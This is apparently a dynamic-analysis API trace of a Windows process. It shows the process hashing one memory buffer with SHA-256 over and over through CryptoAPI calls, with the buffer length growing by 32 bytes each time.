	[0226.065] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0226.065] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbd38
	[0226.065] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x26cbd38, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cbd38, pdwDataLen=0x1284a8) returned 1
	[0226.065] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.065] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.065] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.065] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.065] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0226.065] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbd60
	[0226.066] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cbd60, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cbd60, pdwDataLen=0x1284a8) returned 1
	[0226.066] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.066] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.066] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.066] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.066] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0226.066] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb950
	[0226.066] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x26cb950, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cb950, pdwDataLen=0x1284a8) returned 1
	[0226.066] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.066] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.066] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.066] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.066] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0226.067] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb810
	[0226.067] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cb810, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cb810, pdwDataLen=0x1284a8) returned 1
	[0226.067] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.067] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.067] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.067] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.067] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0226.067] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb978
	[0226.067] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x26cb978, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cb978, pdwDataLen=0x1284a8) returned 1
	[0226.067] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.067] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.067] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.068] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.068] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0226.068] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b000
	[0226.068] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b000, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b000, pdwDataLen=0x1284a8) returned 1
	[0226.068] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.068] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.068] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.068] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.068] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0226.068] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b028
	[0226.068] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b028, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b028, pdwDataLen=0x1284a8) returned 1
	[0226.068] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.068] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.068] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.069] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.069] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0226.069] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b050
	[0226.069] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b050, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b050, pdwDataLen=0x1284a8) returned 1
	[0226.069] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.069] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.069] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.069] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.069] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0226.069] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b078
	[0226.069] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b078, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b078, pdwDataLen=0x1284a8) returned 1
	[0226.069] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.069] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.069] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.070] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.070] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0226.070] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b0a0
	[0226.070] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b0a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b0a0, pdwDataLen=0x1284a8) returned 1
	[0226.070] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.070] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.070] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.070] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.070] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0226.070] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b0c8
	[0226.070] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b0c8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b0c8, pdwDataLen=0x1284a8) returned 1
	[0226.070] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.070] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.070] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.071] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.071] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0226.071] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b0f0
	[0226.071] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b0f0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b0f0, pdwDataLen=0x1284a8) returned 1
	[0226.071] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.071] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.071] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.071] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.071] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0226.071] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.071] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b118
	[0226.071] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b118, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b118, pdwDataLen=0x1284a8) returned 1
	[0226.071] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.072] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.072] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.072] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.072] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0226.072] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.072] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b140
	[0226.072] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b140, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b140, pdwDataLen=0x1284a8) returned 1
	[0226.072] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.072] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.072] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.072] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.072] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0226.073] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b168
	[0226.073] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b168, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b168, pdwDataLen=0x1284a8) returned 1
	[0226.073] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.073] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.073] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.073] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.073] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0226.073] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.073] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b190
	[0226.073] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b190, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b190, pdwDataLen=0x1284a8) returned 1
	[0226.073] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.073] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.073] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.073] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.074] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0226.074] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b1b8
	[0226.074] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b1b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b1b8, pdwDataLen=0x1284a8) returned 1
	[0226.074] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.074] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.074] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.074] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.074] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0226.074] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.074] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b1e0
	[0226.074] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b1e0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b1e0, pdwDataLen=0x1284a8) returned 1
	[0226.074] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.074] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.074] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.075] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.075] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0226.075] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b208
	[0226.075] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b208, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b208, pdwDataLen=0x1284a8) returned 1
	[0226.075] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.075] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.075] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.075] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.075] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0226.075] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b230
	[0226.075] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b230, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b230, pdwDataLen=0x1284a8) returned 1
	[0226.075] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.075] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.075] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.076] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.076] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0226.076] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.076] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b258
	[0226.076] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b258, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b258, pdwDataLen=0x1284a8) returned 1
	[0226.076] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.076] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.076] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.076] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.076] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0226.076] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.076] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b280
	[0226.076] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b280, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b280, pdwDataLen=0x1284a8) returned 1
	[0226.076] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.076] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.076] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.077] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.077] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0226.077] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b2a8
	[0226.077] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b2a8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b2a8, pdwDataLen=0x1284a8) returned 1
	[0226.077] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.077] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.077] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.077] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.077] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0226.077] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.077] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b2d0
	[0226.077] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x231b2d0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b2d0, pdwDataLen=0x1284a8) returned 1
	[0226.077] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.077] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.078] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.078] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.078] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0226.078] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.078] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231b2f8
	[0226.078] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x231b2f8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x231b2f8, pdwDataLen=0x1284a8) returned 1
	[0226.078] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.078] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.078] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
